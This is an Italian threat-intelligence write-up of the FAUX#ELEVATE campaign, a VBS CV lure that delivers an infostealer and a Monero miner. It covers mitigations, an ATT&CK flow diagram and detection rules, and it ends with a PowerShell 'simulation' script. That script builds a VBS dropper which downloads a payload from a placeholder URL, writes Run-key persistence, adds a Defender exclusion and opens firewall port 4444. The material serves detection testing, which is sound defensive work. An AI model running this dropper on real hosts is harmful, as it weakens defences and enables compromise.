Analisi di FAUX#ELEVATE: Attori di Minaccia Puntano alla Francia con Esca CV per Distribuire Crypto Miners e Infostealer che Puntano agli Ambienti Enterprise
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Un’operazione di cybercriminalità sfrutta un file di curriculum VBS malevolo per colpire ambienti aziendali francofoni. Il dropper è altamente offuscato ed è progettato per essere eseguito solo su macchine joinate al dominio, dove distribuisce malware per il furto di credenziali insieme a un miner di Monero. La campagna utilizza servizi fidati come Dropbox e siti WordPress compromessi in Marocco per ospitare i payload. I dati rubati vengono esfiltrati tramite SMTP a mail.ru, e il malware rimuove le tracce dopo l’esecuzione per ridurre la visibilità forense.
Indagine
I ricercatori hanno ingegnerizzato al contrario il dropper VBS, scoperto i suoi controlli ambientali e mappato l’intera catena d’infezione multi-stadio, inclusa l’estrazione con 7-Zip, un RAT personalizzato chiamato RuntimeHost.exe, il furto delle credenziali del browser ChromElevator e l’attività di mining XMRig. Hanno anche identificato l’infrastruttura di supporto come indirizzi IP, voci DNS dinamiche e server WordPress compromessi. La persistenza era collegata a chiavi Run del registro e a un’attività pianificata nascosta.
Mitigazione
I difensori dovrebbero bloccare file VBS sospetti e applicare controlli rigidi sugli allegati email. Il monitoraggio dovrebbe concentrarsi sull’esecuzione anomala di wscript.exe, comandi PowerShell che aggiungono esclusioni in Defender e modifiche al registro che influenzano EnableLUA. Le organizzazioni dovrebbero limitare l’SMTP in uscita da applicazioni non di posta e osservare le connessioni alle infrastrutture note di Dropbox e mining-pool. Qualsiasi chiave di registro o attività pianificata identificata dovrebbe essere rimossa o messa in quarantena.
Risposta
I team di sicurezza dovrebbero rilevare la creazione delle chiavi Run “Microsoft Media Service” e “z_MicrosoftEdgeAutoLaunch_2EDFBF”, insieme al compito pianificato nascosto “MicrosoftUpdateService”. Gli allarmi dovrebbero attivarsi sui processi wscript.exe che si collegano a Dropbox o ai domini WordPress documentati. I file malevoli devono essere messi in quarantena, l’host isolato e le credenziali del browser esposte resettate. Una revisione forense dovrebbe poi determinare se i dati rubati sono stati esfiltrati tramite mail.ru.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Node definitions step_phishing["<b>Tecnica</b> – T1566.001 Phishing: Spearphishing Attachment<br/><b>Descrizione</b>: Email con allegato malevolo che, quando aperto, consegna il payload iniziale."] class step_phishing action step_user_execute["<b>Tecnica</b> – T1204.002 Esecuzione Utente: File Malevolo<br/><b>Descrizione</b>: La vittima esegue il file VBS allegato, attivando il dropper."] class step_user_execute action step_dropper["<b>Tecnica</b> – T1059.005 Visual Basic (VBScript)<br/><b>Tecnica</b> – T1027 File o Informazioni Offuscati<br/><b>Descrizione</b>: Script VBS offuscato agisce come un dropper che estrae componenti aggiuntivi."] class step_dropper action step_domain_check["<b>Tecnica</b> – T1069.002 Scoperta di Gruppi di Permessi: Dominio<br/><b>Descrizione</b>: Verifica se il host è collegato a un dominio per adattare il comportamento."] class step_domain_check technique step_uac_bypass["<b>Tecnica</b> – T1548.002 Bypass Controllo Account Utente<br/><b>Tecnica</b> – T1562.001 Prevenzione: Disabilitare Strumenti di Sicurezza<br/><b>Tecnica</b> – T1564.012 Nascondere Artefatti: Esclusioni Defender<br/><b>Descrizione</b>: Eleva i privilegi, disabilita le difese e aggiunge esclusioni."] class step_uac_bypass technique step_download["<b>Tecnica</b> – T1102 Servizio Web<br/><b>Tecnica</b> – T1102.001 Risolutore Dead Drop<br/><b>Descrizione</b>: Recupera payload aggiuntivi da Dropbox o posizioni web."] class step_download technique step_deploy_toolkit["<b>Strumento</b> – RuntimeHost.exe, XMRig Miner, Ricettatori di Browser<br/><b>Descrizione</b>: Distribuisce componenti per mining, furto di credenziali e ulteriori sfruttamenti."] class step_deploy_toolkit tool step_cred_access["<b>Tecnica</b> – T1555.003 Credenziali dai Browser Web<br/><b>Descrizione</b>: Estrae password e cookie del browser memorizzati."] class step_cred_access technique step_collect_files["<b>Tecnica</b> – T1005 Dati dal Sistema Locale<br/><b>Descrizione</b>: Raccoglie file dal desktop dell’utente per l’esfiltrazione."] class step_collect_files technique step_exfiltration["<b>Tecnica</b> – T1048.002 Esfiltrazione Tramite Protocollo In Cifrato Non C2: SMTP<br/><b>Tecnica</b> – T1071.003 Protocolli Web: Mail Protocols<br/><b>Descrizione</b>: Invia i dati raccolti tramite SMTP cifrato."] class step_exfiltration technique step_resource_hijack["<b>Tecnica</b> – T1496 Appropriazione di Risorse<br/><b>Descrizione</b>: Usa XMRig per minare criptovalute sull’host della vittima."] class step_resource_hijack technique step_process_injection["<b>Tecnica</b> – T1055 Iniezione di Processo<br/><b>Descrizione</b>: Inietta codice malevolo in explorer.exe per nascondere l’attività."] class step_process_injection technique step_c2["<b>Tecnica</b> – T1102 Servizio Web (HTTPS/Dynamic DNS)<br/><b>Descrizione</b>: Mantiene il controllo di comando su traffico web cifrato e porte personalizzate."] class step_c2 technique step_persistence["<b>Tecnica</b> – T1547.001 Chiavi Run di Registro / Cartella di Avvio<br/><b>Tecnica</b> – T1053 Attività Pianificata/Job (Nascosto)<br/><b>Descrizione</b>: Stabilisce la persistenza tramite chiave Run e un’attività pianificata nascosta."] class step_persistence technique step_cleanup["<b>Tecnica</b> – T1070.004 Cancellazione di File<br/><b>Descrizione</b>: Rimuove artefatti e log per evitare il rilevamento."] class step_cleanup technique %% Edge connections step_phishing –>|conduce_a| step_user_execute step_user_execute –>|conduce_a| step_dropper step_dropper –>|conduce_a| step_domain_check step_domain_check –>|conduce_a| step_uac_bypass step_uac_bypass –>|conduce_a| step_download step_download –>|conduce_a| step_deploy_toolkit step_deploy_toolkit –>|abilita| step_cred_access step_deploy_toolkit –>|abilita| step_collect_files step_cred_access –>|combinato_con| step_collect_files step_cred_access –>|supporta| step_exfiltration step_collect_files –>|supporta| step_exfiltration step_deploy_toolkit –>|abilita| step_resource_hijack step_deploy_toolkit –>|abilita| step_process_injection step_process_injection –>|fornisce| step_c2 step_c2 –>|usato_da| step_exfiltration step_deploy_toolkit –>|stabilisce| step_persistence step_persistence –>|seguito_da| step_cleanup step_exfiltration –>|seguito_da| step_cleanup "
Attacco Flow
Rilevazioni
Possibile Comunicazione Tentata di Lookup Dominio IP (via dns)
Visualizza
Disabilitare il Monitoraggio in Tempo Reale di Windows Defender e altre Modifiche alle Preferenze (via cmdline)
Visualizza
Esecuzione Sospetta da Profilo Utente Pubblico (via process_creation)
Visualizza
Possibile Evasione Difesa Estraendo Archivio Cifrato Usando 7-Zip (via cmdline)
Visualizza
LOLBAS WScript / CScript (via process_creation)
Visualizza
Modifica Sospetta delle Esclusioni Defender (via cmdline)
Visualizza
Modifiche Sospette delle Preferenze di Windows Defender (via powershell)
Visualizza
Possibili Punti di Persistenza [ASEPs – Hive Software/NTUSER] (via registry_event)
Visualizza
Attività Pianificata Sospetta (via audit)
Visualizza
Nome File Breve (via cmdline)
Visualizza
Possibile Bypass UAC – Tentativo di Disabilitazione UAC (via registry_event)
Visualizza
File Sospetti nel Profilo Utente Pubblico (via file_event)
Visualizza
IOC (HashSha256) per rilevare: Analisi FAUX#ELEVATE: Gli Attori delle Minacce prendono di Mira la Francia con Esche CV per Distribuire Crypto miner e Infostealer Targeting Enterprise Environments
Visualizza
IOC (SourceIP) per rilevare: Analisi FAUX#ELEVATE: Gli Attori delle Minacce prendono di Mira la Francia con Esche CV per Distribuire Crypto miner e Infostealer Targeting Enterprise Environments
Visualizza
IOC (Emails) per rilevare: Analisi FAUX#ELEVATE: Gli Attori delle Minacce prendono di Mira la Francia con Esche CV per Distribuire Crypto miner e Infostealer Targeting Enterprise Environments
Visualizza
IOC (DestinationIP) per rilevare: Analisi FAUX#ELEVATE: Gli Attori delle Minacce prendono di Mira la Francia con Esche CV per Distribuire Crypto miner e Infostealer Targeting Enterprise Environments
Visualizza
Rilevazione di Credenziali Elevate e Mining di Criptovalute FAUX [Connessioni di Rete Windows]
Visualizza
Rilevamento Comunicazione Dominio SMTP e C2 [Connessioni di Rete Windows]
Visualizza
Rilevamento Persistenza e Furto di Credenziali della Campagna FAUX#ELEVATE [Creazione Processo Windows]
Visualizza
Rilevamento di Dropper VBS Malevolo e Modifiche Firewall [Creazione Processo Windows]
Visualizza
Esecuzione Simulazione
Prerequisito: Il Telemetry & Baseline Pre-flight Check deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati ed essere progettati per generare la telemetria esatta attesa dalla logica di rilevamento.
-
Narrazione Attacco & Comandi:
- Fase 1 – Rilasciare VBS malevolo: L’attaccante scrive un dropper VBS che scarica un payload di secondo stadio e scrive una chiave run del registro per la persistenza.
- Fase 2 – Eseguire VBS tramite
wscript.execon PowerShell come processo genitore, soddisfacendo così la condizione di rilevamento genitore-figlio. - Fase 3 – All’interno del VBS, invocare PowerShell per aggiungere un’esclusione di Microsoft Defender (T1562.001) e Netsh per aprire la porta TCP in entrata 4444 (T1562.004) per il C2.
- Fase 4 – Pulire le prove dopo il successo.
-
Script Test di Regressione: (PowerShell – contenuto autonomo; eseguire con diritti amministrativi)
# ----------------------------------------------------------------------- # Simulazione Dropper VBS Maligni – attiva la regola Sigma: # Image == "*wscript.exe" AND ParentImage in ("*powershell.exe","*netsh.exe") # ----------------------------------------------------------------------- $vbsPath = "$env:Tempmalicious_dropper.vbs" $payloadUrl = "http://example.com/payload.exe" # URL segnaposto $payloadPath = "$env:Temppayload.exe" # 1. Creare un VBS maligno che: # • Scarica un payload # • Scrive una chiave Run per persistenza # • Chiama PowerShell per aggiungere esclusione Defender # • Chiama Netsh per aprire una regola firewall $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET", "$payloadUrl", False objXML.Send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$payloadPath", 2 End If
‘ Persist via Run key Set objShell = CreateObject(“WScript.Shell”) objShell.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious”, “$payloadPath”
‘ Defender exclusion via PowerShell (executed inline) objShell.Run “powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'“”, 0, True
‘ Open firewall port 4444 via Netsh (executed inline) objShell.Run “netsh.exe advfirewall firewall add rule name="MaliciousPort” dir=in action=allow protocol=TCP localport=4444″, 0, True “@
Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. Lanciare il VBS con PowerShell come processo genitore
Write-Host "[*] Avviando VBS malevolo tramite wscript.exe (genitore: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait
# 3. Verificare che la regola firewall sia stata aggiunta (opzionale)
netsh advfirewall firewall show rule name=MaliciousPort
# 4. Ripulire gli artefatti (payload & VBS) – lasciato per sezione di pulizia separata
Write-Host "[+] Simulazione completata. Rivedere gli allarmi nel SIEM."
-
Comandi di Pulizia: (eseguire dopo la verifica)
# Rimuovere la regola firewall netsh advfirewall firewall delete rule name="MaliciousPort" # Rimuovere l'esclusione Defender powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'" # Cancellare la chiave Run di persistenza reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f # Eliminare i file Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force Remove-Item -Path "$env:Temppayload.exe" -Force Write-Host "[+] Pulizia completata."